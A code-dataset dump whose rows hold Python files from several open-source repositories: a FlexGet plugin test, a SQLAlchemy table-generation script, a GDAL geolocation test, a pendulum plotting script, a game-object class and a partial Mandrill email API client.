repo_name
stringlengths 6
61
| path
stringlengths 4
230
| copies
stringlengths 1
3
| size
stringlengths 4
6
| text
stringlengths 1.01k
850k
| license
stringclasses 15
values | hash
int64 -9,220,477,234,079,998,000
9,219,060,020B
| line_mean
float64 11.6
96.6
| line_max
int64 32
939
| alpha_frac
float64 0.26
0.9
| autogenerated
bool 1
class | ratio
float64 1.62
6.1
| config_test
bool 2
classes | has_no_keywords
bool 2
classes | few_assignments
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
asm0dey/Flexget | tests/test_import_series_betaseries_list.py | 1 | 4220 | from __future__ import unicode_literals, division, absolute_import
from mock import patch, call
from tests import FlexGetBase
import flexget.plugins.input.betaseries_list
def assert_mock_calls(expected_calls, mock_object):
assert expected_calls == mock_object.mock_calls, "expecting calls %r, got %r instead" % \
(expected_calls, mock_object.mock_calls)
def assert_series_count_in_db(expected_count):
from flexget.plugins.filter.series import Series
from flexget.manager import Session
session = Session()
actual_series_count = session.query(Series).count()
assert expected_count == actual_series_count, "expecting %s series stored in db, got %s instead" % \
(expected_count, actual_series_count)
class Test_import_series_betaseries_list(FlexGetBase):
__yaml__ = """
tasks:
test_no_members:
configure_series:
from:
betaseries_list:
username: user_foo
password: passwd_foo
api_key: api_key_foo
test_with_one_members:
configure_series:
from:
betaseries_list:
username: user_foo
password: passwd_foo
api_key: api_key_foo
members:
- other_member_1
test_with_two_members:
configure_series:
from:
betaseries_list:
username: user_foo
password: passwd_foo
api_key: api_key_foo
members:
- other_member_1
- other_member_2
"""
def setup(self):
super(Test_import_series_betaseries_list, self).setup()
## mock create_token
self.create_token_patcher = patch.object(flexget.plugins.input.betaseries_list, "create_token",
return_value='token_foo')
self.create_token_mock = self.create_token_patcher.start()
## mock query_series
self.query_series_patcher = patch.object(flexget.plugins.input.betaseries_list, "query_series",
return_value=[])
self.query_series_mock = self.query_series_patcher.start()
def teardown(self):
super(Test_import_series_betaseries_list, self).teardown()
self.create_token_patcher.stop()
self.query_series_patcher.stop()
def test_no_members(self):
# GIVEN
self.query_series_mock.return_value = ["Breaking Bad", "Dexter"]
# WHEN
self.execute_task('test_no_members')
# THEN
assert_series_count_in_db(2)
assert_mock_calls([call('api_key_foo', 'user_foo', 'passwd_foo')], self.create_token_mock)
assert_mock_calls([call('api_key_foo', 'token_foo', 'user_foo')], self.query_series_mock)
def test_with_one_members(self):
# GIVEN
self.query_series_mock.return_value = ["Breaking Bad", "Dexter", "The Simpsons"]
# WHEN
self.execute_task('test_with_one_members')
# THEN
assert_series_count_in_db(3)
assert_mock_calls([call('api_key_foo', 'user_foo', 'passwd_foo')], self.create_token_mock)
assert_mock_calls([call('api_key_foo', 'token_foo', 'other_member_1')], self.query_series_mock)
def test_with_two_members(self):
# GIVEN
return_values_generator = (val for val in [
["Family guy", "The Simpsons"],
["Breaking Bad", "Dexter", "The Simpsons"],
])
self.query_series_mock.side_effect = lambda *args: return_values_generator.next()
# WHEN
self.execute_task('test_with_two_members')
# THEN
assert_series_count_in_db(4)
assert_mock_calls([call('api_key_foo', 'user_foo', 'passwd_foo')], self.create_token_mock)
assert_mock_calls(
[
call('api_key_foo', 'token_foo', 'other_member_1'),
call('api_key_foo', 'token_foo', 'other_member_2')
], self.query_series_mock)
| mit | -1,775,541,269,650,433,300 | 38.074074 | 104 | 0.557109 | false | 3.857404 | true | false | false |
bmcfee/gordon | gordon/web/gordonweb/autocode2.py | 1 | 4603 | # autocode.py
#
# Author(s): Christophe de Vienne <[email protected]>
# Paul Johnson
#
# Based on autocode.py by Paul Johnson
# (http://www.sqlalchemy.org/trac/wiki/UsageRecipes/AutoCode)
#
# Improvements over the original autocode.py:
# * Takes arguments on the command line to select the dburl and
# the output destination
# * Replace a bunch of database specific types by generic ones.
# This is incomplete as it feats only my needs for a mysql to mssql
# database conversion.
# * Output the indexes and ForeignKeyConstraints (including multi-columns
# ones) correctly
#
# The resulting script is directly usable (ie import and create/use the tables)
# with my testing database (a legacy mysql db with about 140+ tables, 140+
# foreign keys, 170+ indexes), after applying patches
# http://www.sqlalchemy.org/trac/ticket/662 and
# http://www.sqlalchemy.org/trac/ticket/663 on a 0.3.9 release.
#
from sqlalchemy import *
from sqlalchemy.databases import information_schema
import string
import sys
from optparse import OptionParser
parser = OptionParser("usage: %prog [options] dburl")
parser.add_option('--output', '-o', action='store', dest='output',
metavar='FILE', default='stdout',
help='Write the result into FILE (default "stdout")')
(options, args) = parser.parse_args()
if len(args) != 1:
parser.error('Wrong number or arguments')
dburl = engine.url.make_url(args[0])
db = create_engine(dburl)
metadata = BoundMetaData(db)
if options.output == 'stdout':
output = sys.stdout
else:
output = open(options.output, 'w')
def textclause_repr(self):
return 'text(%s)' % repr(self.text)
def table_repr(self):
return "Table(%s)" % ",\n ".join(
[repr(self.name)] + [repr(self.metadata)] +
[repr(x) for x in self.columns] +
[repr(x) for x in self.constraints
if not isinstance(x, PrimaryKeyConstraint)]
)
def column_repr(self):
kwarg = []
if self.key != self.name:
kwarg.append('key')
if self._primary_key:
kwarg.append('primary_key')
if not self.nullable:
kwarg.append('nullable')
if self.onupdate:
kwarg.append('onupdate')
if self.default:
kwarg.append('default')
return "Column(%s)" % ', '.join(
[repr(self.name)] + [repr(self.type)] +
[repr(x) for x in self.constraints] +
["%s=%s" % (k, repr(getattr(self, k))) for k in kwarg]
)
def foreignkeyconstraint_repr(self):
return "ForeignKeyConstraint(%s)" % ', '.join(
[
repr([x.parent.name for x in self.elements]),
repr([x._get_colspec() for x in self.elements]),
'name=' + repr(self.name)
]
)
def repr_index(index, tvarname):
return "Index(%s)" % ", ".join(
[repr(index.name)] +
["%s.c.%s" % (tvarname, c.name) for c in index.columns] +
['unique=' + repr(index.unique)])
sql._TextClause.__repr__ = textclause_repr
schema.Table.__repr__ = table_repr
schema.Column.__repr__ = column_repr
schema.ForeignKeyConstraint.__repr__ = foreignkeyconstraint_repr
sql = select([information_schema.tables.c.table_name,
information_schema.tables.c.table_schema],
information_schema.tables.c.table_schema==dburl.database)
output.write("""from sqlalchemy import *
metadata = MetaData()
""")
tname_list = []
for tname,schema in db.execute(sql):
if schema != dburl.database:
continue
tname_list.append(tname)
tbl = Table(tname, metadata, schema=schema, autoload=True)
code = repr(tbl)
code = code.replace('BoundMetaData()', 'metadata')
code = code.replace('MSChar', 'CHAR')
code = code.replace('MSSmallInteger(length=1)', 'Boolean()')
code = code.replace('MSSmallInteger', 'SmallInteger')
code = code.replace('MSDateTime', 'DateTime')
code = code.replace('MSMediumText', 'TEXT')
code = code.replace('MSDouble', 'Numeric')
code = code.replace('MSMediumText', 'TEXT')
code = code.replace('MSLongBlob', 'TEXT')
code = code.replace('MSString', 'String')
code = code.replace('MSDate', 'Date')
code = code.replace('MSTime', 'DateTime')
code = code.replace('MSInteger', 'Integer')
code = code.replace('MSDecimal', 'Numeric')
code = code.replace('MSEnum', 'Integer')
caps = string.capitalize(tname)
indexes = "\n".join(
[repr_index(index, tname) for index in tbl.indexes])
output.write( """
%s = %s
%s
""" % (tname, code, indexes))
# vim: expandtab tabstop=4 shiftwidth=4:
| gpl-3.0 | -1,114,520,356,102,453,100 | 30.744828 | 79 | 0.636976 | false | 3.471342 | false | false | false |
PeterWangIntel/chromium-crosswalk | third_party/mojo/src/mojo/public/tools/dart_list_packages_contents.py | 4 | 1113 | #!/usr/bin/python
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""This script outputs the filenames of the files that are in the "packages/"
subdir of the given directory, relative to that directory."""
import argparse
import os
import sys
def main(target_directory):
os.chdir(target_directory)
for root, _, files in os.walk("packages", followlinks=True):
for f in files:
print os.path.join(root, f)
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description="List filenames of files in the packages/ subdir of the "
"given directory.")
parser.add_argument("--target-directory",
dest="target_directory",
metavar="<target-directory>",
type=str,
required=True,
help="The target directory, specified relative to this "
"directory.")
args = parser.parse_args()
sys.exit(main(args.target_directory))
| bsd-3-clause | 5,526,486,606,323,830,000 | 34.903226 | 78 | 0.624438 | false | 4.46988 | false | false | false |
schwehr/gdal-autotest2 | python/gcore/geoloc_test.py | 1 | 2973 | #!/usr/bin/env python
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This is a complete rewrite of a file licensed as follows:
#
# Copyright (c) 2007, Frank Warmerdam <[email protected]>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
"""Test geolocation warper.
Rewrite of:
http://trac.osgeo.org/gdal/browser/trunk/autotest/gcore/geoloc.py
"""
import contextlib
import os
from osgeo import gdal
import unittest
from autotest2.gcore import gcore_util
from autotest2.gdrivers import gdrivers_util
EXT = '.vrt'
@contextlib.contextmanager
def PushDir(path):
orig_path = os.getcwd()
os.chdir(path)
yield
os.chdir(orig_path)
@gdrivers_util.SkipIfDriverMissing(gdrivers_util.VRT_DRIVER)
@gdrivers_util.SkipIfDriverMissing(gdrivers_util.GTIFF_DRIVER)
class GeolocTest(gdrivers_util.DriverTestCase):
def setUp(self):
super(GeolocTest, self).setUp(gdrivers_util.VRT_DRIVER, EXT)
def testGeoloc01WarpSst(self):
filepath = gcore_util.GetTestFilePath('warpsst.vrt')
with PushDir(os.path.dirname(filepath)):
self.CheckOpen(filepath)
self.CheckGeoTransform((-90.30271148, 0.15466423, 0, 33.87552642, 0,
-0.15466423))
# TODO(schwehr): The changing checksum of the band with GDAL updates implies
# that this test is brittle and needs to be reworked.
self.CheckBand(1, 62319, gdal.GDT_Int16)
if __name__ == '__main__':
unittest.main()
| apache-2.0 | -6,382,233,387,539,526,000 | 34.392857 | 80 | 0.75143 | false | 3.684015 | true | false | false |
jpalladino84/Python-Roguelike-Framework | components/game_object.py | 2 | 2642 | from components.component import valid_components
class GameObject(object):
def __init__(self):
self.components = {}
self.observers = {}
self.responders = {}
def copy_to(self, new_game_object):
for component in self.components.values():
new_game_object.register_component(component.copy())
return new_game_object
def get_component(self, component_name):
return self.components.get(component_name, None)
def update(self):
for component in self.components.values():
component.update()
def transmit_message(self, sender, message_type, **kwargs):
if message_type in self.observers:
for observer, func in self.observers[message_type]:
if observer != sender:
func(**kwargs)
def transmit_query(self, sender, query_type, **kwargs):
responses = []
if query_type in self.responders:
for responder, func in self.responders[query_type]:
if responder != sender:
responses.append(func(**kwargs))
return responses
def register_observer(self, observer, message_type, func):
if message_type not in self.observers:
self.observers[message_type] = []
if func not in self.observers[message_type]:
self.observers[message_type].append((observer, func))
def register_query_responder(self, responder, query_type, func):
if query_type not in self.responders:
self.responders[query_type] = []
if func not in self.responders[query_type]:
self.responders[query_type].append((responder, func))
def register_component(self, component):
if component.NAME in self.components:
self.unregister_component(component)
self.components[component.NAME] = component
component.on_register(self)
def unregister_component(self, component):
if component.NAME in self.components:
component.on_unregister()
del self.components[component.NAME]
def __getattr__(self, item):
if item in valid_components:
component = self.get_component(item)
if component:
return component
return NoneVoid()
raise AttributeError()
class NoneVoid(object):
"""
This class's only purpose is to Falsify any other calls make to get attributes from it.
It allows us to duck type into components a little easier.
"""
def __getattr__(self, item):
return None
def __bool__(self):
return False
| mit | -4,211,882,567,242,188,000 | 31.617284 | 91 | 0.618092 | false | 4.381426 | false | false | false |
MattDerry/pendulum_3d | src/plot_scripts/plot.py | 1 | 2915 | #!/usr/bin/env python
import numpy as np
import pylab
import yaml
stream = file('time.yaml', 'r')
TIME_LOG = yaml.load(stream)
stream.close()
time2 = TIME_LOG[1]
time4 = TIME_LOG[2]
time6 = TIME_LOG[3]
time8 = TIME_LOG[4]
time10 = TIME_LOG[5]
stream = file('config.yaml', 'r')
CONFIG_LOG = yaml.load(stream)
stream.close()
for i in range(0, len(CONFIG_LOG)):
for j in range(0, len(CONFIG_LOG[i])):
for k in range(0, len(CONFIG_LOG[i][j])):
if np.isnan(CONFIG_LOG[i][j][k]):
print "Config NaN found and replaced"
CONFIG_LOG[i][j][k] = 0
config2 = np.asanyarray(CONFIG_LOG[1])
config4 = np.asanyarray(CONFIG_LOG[2])
config6 = np.asanyarray(CONFIG_LOG[3])
config8 = np.asanyarray(CONFIG_LOG[4])
config10 = np.asanyarray(CONFIG_LOG[5])
stream = file('command.yaml', 'r')
COMMAND_LOG = yaml.load(stream)
stream.close()
for i in range(0, len(COMMAND_LOG)):
for j in range(0, len(COMMAND_LOG[i])):
for k in range(0, len(COMMAND_LOG[i][j])):
if np.isnan(COMMAND_LOG[i][j][k]):
print "Command NaN found and replaced"
COMMAND_LOG[i][j][k] = 0
command2 = np.asanyarray(COMMAND_LOG[1])
command4 = np.asanyarray(COMMAND_LOG[2])
command6 = np.asanyarray(COMMAND_LOG[3])
command8 = np.asanyarray(COMMAND_LOG[4])
command10 = np.asanyarray(COMMAND_LOG[5])
#roygbiv
ax1 = pylab.subplot(211)
line2, = pylab.plot(time2, config2[:,0])
line4, = pylab.plot(time4, config4[:,0])
line6, = pylab.plot(time6, config6[:,0])
line8, = pylab.plot(time8, config8[:,0])
line10, = pylab.plot(time10, config10[:,0])
pylab.axvline(x=1.0, linewidth=3, linestyle="--", color="gray")
pylab.setp(line2, linewidth=3, color='red')
pylab.setp(line4, linewidth=3, color='orange')
pylab.setp(line6, linewidth=3, color='yellow')
pylab.setp(line8, linewidth=3, color='green')
pylab.setp(line10, linewidth=3, color='blue')
pylab.legend([line2, line4, line6, line8, line10], ["Trust 0.2", "Trust 0.4", "Trust 0.6", "Trust 0.8", "Trust 1.0"])
pylab.title("Feedback Controller Input Blended with User Input at Different Levels of Trust")
pylab.ylabel("Base Joint Angle about X-axis (radians)")
ax2 = pylab.subplot(212, sharex=ax1)
line2, = pylab.plot(time2, config2[:,1])
line4, = pylab.plot(time4, config4[:,1])
line6, = pylab.plot(time6, config6[:,1])
line8, = pylab.plot(time8, config8[:,1])
line10, = pylab.plot(time10, config10[:,1])
pylab.axvline(x=1.0, linewidth=3, linestyle="--", color="gray")
pylab.setp(line2, linewidth=3, color='red')
pylab.setp(line4, linewidth=3, color='orange')
pylab.setp(line6, linewidth=3, color='yellow')
pylab.setp(line8, linewidth=3, color='green')
pylab.setp(line10, linewidth=3, color='blue')
pylab.legend([line2, line4, line6, line8, line10], ["Trust 0.2", "Trust 0.4", "Trust 0.6", "Trust 0.8", "Trust 1.0"])
pylab.xlabel("Time (sec)")
pylab.ylabel("Base Joint Angle about Y-axis (radians)")
pylab.show()
| gpl-2.0 | 5,684,757,395,999,922,000 | 35.898734 | 117 | 0.66964 | false | 2.669414 | true | false | false |
bitex-coin/backend | mailer/mandrill.py | 12 | 203026 | import requests, os.path, logging, sys, time
try:
import ujson as json
except ImportError:
try:
import simplejson as json
except ImportError:
import json
class Error(Exception):
pass
class ValidationError(Error):
pass
class InvalidKeyError(Error):
pass
class PaymentRequiredError(Error):
pass
class UnknownSubaccountError(Error):
pass
class UnknownTemplateError(Error):
pass
class ServiceUnavailableError(Error):
pass
class UnknownMessageError(Error):
pass
class InvalidTagNameError(Error):
pass
class InvalidRejectError(Error):
pass
class UnknownSenderError(Error):
pass
class UnknownUrlError(Error):
pass
class UnknownTrackingDomainError(Error):
pass
class InvalidTemplateError(Error):
pass
class UnknownWebhookError(Error):
pass
class UnknownInboundDomainError(Error):
pass
class UnknownInboundRouteError(Error):
pass
class UnknownExportError(Error):
pass
class IPProvisionLimitError(Error):
pass
class UnknownPoolError(Error):
pass
class NoSendingHistoryError(Error):
pass
class PoorReputationError(Error):
pass
class UnknownIPError(Error):
pass
class InvalidEmptyDefaultPoolError(Error):
pass
class InvalidDeleteDefaultPoolError(Error):
pass
class InvalidDeleteNonEmptyPoolError(Error):
pass
class InvalidCustomDNSError(Error):
pass
class InvalidCustomDNSPendingError(Error):
pass
class MetadataFieldLimitError(Error):
pass
class UnknownMetadataFieldError(Error):
pass
ROOT = 'https://mandrillapp.com/api/1.0/'
ERROR_MAP = {
'ValidationError': ValidationError,
'Invalid_Key': InvalidKeyError,
'PaymentRequired': PaymentRequiredError,
'Unknown_Subaccount': UnknownSubaccountError,
'Unknown_Template': UnknownTemplateError,
'ServiceUnavailable': ServiceUnavailableError,
'Unknown_Message': UnknownMessageError,
'Invalid_Tag_Name': InvalidTagNameError,
'Invalid_Reject': InvalidRejectError,
'Unknown_Sender': UnknownSenderError,
'Unknown_Url': UnknownUrlError,
'Unknown_TrackingDomain': UnknownTrackingDomainError,
'Invalid_Template': InvalidTemplateError,
'Unknown_Webhook': UnknownWebhookError,
'Unknown_InboundDomain': UnknownInboundDomainError,
'Unknown_InboundRoute': UnknownInboundRouteError,
'Unknown_Export': UnknownExportError,
'IP_ProvisionLimit': IPProvisionLimitError,
'Unknown_Pool': UnknownPoolError,
'NoSendingHistory': NoSendingHistoryError,
'PoorReputation': PoorReputationError,
'Unknown_IP': UnknownIPError,
'Invalid_EmptyDefaultPool': InvalidEmptyDefaultPoolError,
'Invalid_DeleteDefaultPool': InvalidDeleteDefaultPoolError,
'Invalid_DeleteNonEmptyPool': InvalidDeleteNonEmptyPoolError,
'Invalid_CustomDNS': InvalidCustomDNSError,
'Invalid_CustomDNSPending': InvalidCustomDNSPendingError,
'Metadata_FieldLimit': MetadataFieldLimitError,
'Unknown_MetadataField': UnknownMetadataFieldError
}
logger = logging.getLogger('mandrill')
logger.setLevel(logging.INFO)
logger.addHandler(logging.StreamHandler(sys.stderr))
class Mandrill(object):
def __init__(self, apikey=None, debug=False):
'''Initialize the API client
Args:
apikey (str|None): provide your Mandrill API key. If this is left as None, we will attempt to get the API key from the following locations::
- MANDRILL_APIKEY in the environment vars
- ~/.mandrill.key for the user executing the script
- /etc/mandrill.key
debug (bool): set to True to log all the request and response information to the "mandrill" logger at the INFO level. When set to false, it will log at the DEBUG level. By default it will write log entries to STDERR
'''
self.session = requests.session()
if debug:
self.level = logging.INFO
else:
self.level = logging.DEBUG
self.last_request = None
if apikey is None:
if 'MANDRILL_APIKEY' in os.environ:
apikey = os.environ['MANDRILL_APIKEY']
else:
apikey = self.read_configs()
if apikey is None: raise Error('You must provide a Mandrill API key')
self.apikey = apikey
self.templates = Templates(self)
self.exports = Exports(self)
self.users = Users(self)
self.rejects = Rejects(self)
self.inbound = Inbound(self)
self.tags = Tags(self)
self.messages = Messages(self)
self.whitelists = Whitelists(self)
self.ips = Ips(self)
self.internal = Internal(self)
self.subaccounts = Subaccounts(self)
self.urls = Urls(self)
self.webhooks = Webhooks(self)
self.senders = Senders(self)
self.metadata = Metadata(self)
def call(self, url, params=None):
'''Actually make the API call with the given params - this should only be called by the namespace methods - use the helpers in regular usage like m.tags.list()'''
if params is None: params = {}
params['key'] = self.apikey
params = json.dumps(params)
self.log('POST to %s%s.json: %s' % (ROOT, url, params))
start = time.time()
r = self.session.post('%s%s.json' % (ROOT, url), data=params, headers={'content-type': 'application/json', 'user-agent': 'Mandrill-Python/1.0.55'})
try:
remote_addr = r.raw._original_response.fp._sock.getpeername() # grab the remote_addr before grabbing the text since the socket will go away
except:
remote_addr = (None, None) #we use two private fields when getting the remote_addr, so be a little robust against errors
response_body = r.text
complete_time = time.time() - start
self.log('Received %s in %.2fms: %s' % (r.status_code, complete_time * 1000, r.text))
self.last_request = {'url': url, 'request_body': params, 'response_body': r.text, 'remote_addr': remote_addr, 'response': r, 'time': complete_time}
result = json.loads(response_body)
if r.status_code != requests.codes.ok:
raise self.cast_error(result)
return result
def cast_error(self, result):
'''Take a result representing an error and cast it to a specific exception if possible (use a generic mandrill.Error exception for unknown cases)'''
if not 'status' in result or result['status'] != 'error' or not 'name' in result:
raise Error('We received an unexpected error: %r' % result)
if result['name'] in ERROR_MAP:
return ERROR_MAP[result['name']](result['message'])
return Error(result['message'])
def read_configs(self):
'''Try to read the API key from a series of files if it's not provided in code'''
paths = [os.path.expanduser('~/.mandrill.key'), '/etc/mandrill.key']
for path in paths:
try:
f = open(path, 'r')
apikey = f.read().strip()
f.close()
if apikey != '':
return apikey
except:
pass
return None
def log(self, *args, **kwargs):
'''Proxy access to the mandrill logger, changing the level based on the debug setting'''
logger.log(self.level, *args, **kwargs)
def __repr__(self):
return '<Mandrill %s>' % self.apikey
class Templates(object):
def __init__(self, master):
self.master = master
def add(self, name, from_email=None, from_name=None, subject=None, code=None, text=None, publish=True, labels=[]):
"""Add a new template
Args:
name (string): the name for the new template - must be unique
from_email (string): a default sending address for emails sent using this template
from_name (string): a default from name to be used
subject (string): a default subject line to be used
code (string): the HTML code for the template with mc:edit attributes for the editable elements
text (string): a default text part to be used when sending with this template
publish (boolean): set to false to add a draft template without publishing
labels (array): an optional array of up to 10 labels to use for filtering templates::
labels[] (string): a single label
Returns:
struct. the information saved about the new template::
slug (string): the immutable unique code name of the template
name (string): the name of the template
labels (array): the list of labels applied to the template::
labels[] (string): a single label
code (string): the full HTML code of the template, with mc:edit attributes marking the editable elements - draft version
subject (string): the subject line of the template, if provided - draft version
from_email (string): the default sender address for the template, if provided - draft version
from_name (string): the default sender from name for the template, if provided - draft version
text (string): the default text part of messages sent with the template, if provided - draft version
publish_name (string): the same as the template name - kept as a separate field for backwards compatibility
publish_code (string): the full HTML code of the template, with mc:edit attributes marking the editable elements that are available as published, if it has been published
publish_subject (string): the subject line of the template, if provided
publish_from_email (string): the default sender address for the template, if provided
publish_from_name (string): the default sender from name for the template, if provided
publish_text (string): the default text part of messages sent with the template, if provided
published_at (string): the date and time the template was last published as a UTC string in YYYY-MM-DD HH:MM:SS format, or null if it has not been published
created_at (string): the date and time the template was first created as a UTC string in YYYY-MM-DD HH:MM:SS format
updated_at (string): the date and time the template was last modified as a UTC string in YYYY-MM-DD HH:MM:SS format
Raises:
InvalidTemplateError: The given template name already exists or contains invalid characters
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'name': name, 'from_email': from_email, 'from_name': from_name, 'subject': subject, 'code': code, 'text': text, 'publish': publish, 'labels': labels}
return self.master.call('templates/add', _params)
def info(self, name):
"""Get the information for an existing template
Args:
name (string): the immutable name of an existing template
Returns:
struct. the requested template information::
slug (string): the immutable unique code name of the template
name (string): the name of the template
labels (array): the list of labels applied to the template::
labels[] (string): a single label
code (string): the full HTML code of the template, with mc:edit attributes marking the editable elements - draft version
subject (string): the subject line of the template, if provided - draft version
from_email (string): the default sender address for the template, if provided - draft version
from_name (string): the default sender from name for the template, if provided - draft version
text (string): the default text part of messages sent with the template, if provided - draft version
publish_name (string): the same as the template name - kept as a separate field for backwards compatibility
publish_code (string): the full HTML code of the template, with mc:edit attributes marking the editable elements that are available as published, if it has been published
publish_subject (string): the subject line of the template, if provided
publish_from_email (string): the default sender address for the template, if provided
publish_from_name (string): the default sender from name for the template, if provided
publish_text (string): the default text part of messages sent with the template, if provided
published_at (string): the date and time the template was last published as a UTC string in YYYY-MM-DD HH:MM:SS format, or null if it has not been published
created_at (string): the date and time the template was first created as a UTC string in YYYY-MM-DD HH:MM:SS format
updated_at (string): the date and time the template was last modified as a UTC string in YYYY-MM-DD HH:MM:SS format
Raises:
UnknownTemplateError: The requested template does not exist
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'name': name}
return self.master.call('templates/info', _params)
def update(self, name, from_email=None, from_name=None, subject=None, code=None, text=None, publish=True, labels=None):
"""Update the code for an existing template. If null is provided for any fields, the values will remain unchanged.
Args:
name (string): the immutable name of an existing template
from_email (string): the new default sending address
from_name (string): the new default from name
subject (string): the new default subject line
code (string): the new code for the template
text (string): the new default text part to be used
publish (boolean): set to false to update the draft version of the template without publishing
labels (array): an optional array of up to 10 labels to use for filtering templates::
labels[] (string): a single label
Returns:
struct. the template that was updated::
slug (string): the immutable unique code name of the template
name (string): the name of the template
labels (array): the list of labels applied to the template::
labels[] (string): a single label
code (string): the full HTML code of the template, with mc:edit attributes marking the editable elements - draft version
subject (string): the subject line of the template, if provided - draft version
from_email (string): the default sender address for the template, if provided - draft version
from_name (string): the default sender from name for the template, if provided - draft version
text (string): the default text part of messages sent with the template, if provided - draft version
publish_name (string): the same as the template name - kept as a separate field for backwards compatibility
publish_code (string): the full HTML code of the template, with mc:edit attributes marking the editable elements that are available as published, if it has been published
publish_subject (string): the subject line of the template, if provided
publish_from_email (string): the default sender address for the template, if provided
publish_from_name (string): the default sender from name for the template, if provided
publish_text (string): the default text part of messages sent with the template, if provided
published_at (string): the date and time the template was last published as a UTC string in YYYY-MM-DD HH:MM:SS format, or null if it has not been published
created_at (string): the date and time the template was first created as a UTC string in YYYY-MM-DD HH:MM:SS format
updated_at (string): the date and time the template was last modified as a UTC string in YYYY-MM-DD HH:MM:SS format
Raises:
UnknownTemplateError: The requested template does not exist
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'name': name, 'from_email': from_email, 'from_name': from_name, 'subject': subject, 'code': code, 'text': text, 'publish': publish, 'labels': labels}
return self.master.call('templates/update', _params)
def publish(self, name):
"""Publish the content for the template. Any new messages sent using this template will start using the content that was previously in draft.
Args:
name (string): the immutable name of an existing template
Returns:
struct. the template that was published::
slug (string): the immutable unique code name of the template
name (string): the name of the template
labels (array): the list of labels applied to the template::
labels[] (string): a single label
code (string): the full HTML code of the template, with mc:edit attributes marking the editable elements - draft version
subject (string): the subject line of the template, if provided - draft version
from_email (string): the default sender address for the template, if provided - draft version
from_name (string): the default sender from name for the template, if provided - draft version
text (string): the default text part of messages sent with the template, if provided - draft version
publish_name (string): the same as the template name - kept as a separate field for backwards compatibility
publish_code (string): the full HTML code of the template, with mc:edit attributes marking the editable elements that are available as published, if it has been published
publish_subject (string): the subject line of the template, if provided
publish_from_email (string): the default sender address for the template, if provided
publish_from_name (string): the default sender from name for the template, if provided
publish_text (string): the default text part of messages sent with the template, if provided
published_at (string): the date and time the template was last published as a UTC string in YYYY-MM-DD HH:MM:SS format, or null if it has not been published
created_at (string): the date and time the template was first created as a UTC string in YYYY-MM-DD HH:MM:SS format
updated_at (string): the date and time the template was last modified as a UTC string in YYYY-MM-DD HH:MM:SS format
Raises:
UnknownTemplateError: The requested template does not exist
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'name': name}
return self.master.call('templates/publish', _params)
def delete(self, name):
"""Delete a template
Args:
name (string): the immutable name of an existing template
Returns:
struct. the template that was deleted::
slug (string): the immutable unique code name of the template
name (string): the name of the template
labels (array): the list of labels applied to the template::
labels[] (string): a single label
code (string): the full HTML code of the template, with mc:edit attributes marking the editable elements - draft version
subject (string): the subject line of the template, if provided - draft version
from_email (string): the default sender address for the template, if provided - draft version
from_name (string): the default sender from name for the template, if provided - draft version
text (string): the default text part of messages sent with the template, if provided - draft version
publish_name (string): the same as the template name - kept as a separate field for backwards compatibility
publish_code (string): the full HTML code of the template, with mc:edit attributes marking the editable elements that are available as published, if it has been published
publish_subject (string): the subject line of the template, if provided
publish_from_email (string): the default sender address for the template, if provided
publish_from_name (string): the default sender from name for the template, if provided
publish_text (string): the default text part of messages sent with the template, if provided
published_at (string): the date and time the template was last published as a UTC string in YYYY-MM-DD HH:MM:SS format, or null if it has not been published
created_at (string): the date and time the template was first created as a UTC string in YYYY-MM-DD HH:MM:SS format
updated_at (string): the date and time the template was last modified as a UTC string in YYYY-MM-DD HH:MM:SS format
Raises:
UnknownTemplateError: The requested template does not exist
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'name': name}
return self.master.call('templates/delete', _params)
def list(self, label=None):
"""Return a list of all the templates available to this user
Args:
label (string): an optional label to filter the templates
Returns:
array. an array of structs with information about each template::
[] (struct): the information on each template in the account::
[].slug (string): the immutable unique code name of the template
[].name (string): the name of the template
[].labels (array): the list of labels applied to the template::
[].labels[] (string): a single label
[].code (string): the full HTML code of the template, with mc:edit attributes marking the editable elements - draft version
[].subject (string): the subject line of the template, if provided - draft version
[].from_email (string): the default sender address for the template, if provided - draft version
[].from_name (string): the default sender from name for the template, if provided - draft version
[].text (string): the default text part of messages sent with the template, if provided - draft version
[].publish_name (string): the same as the template name - kept as a separate field for backwards compatibility
[].publish_code (string): the full HTML code of the template, with mc:edit attributes marking the editable elements that are available as published, if it has been published
[].publish_subject (string): the subject line of the template, if provided
[].publish_from_email (string): the default sender address for the template, if provided
[].publish_from_name (string): the default sender from name for the template, if provided
[].publish_text (string): the default text part of messages sent with the template, if provided
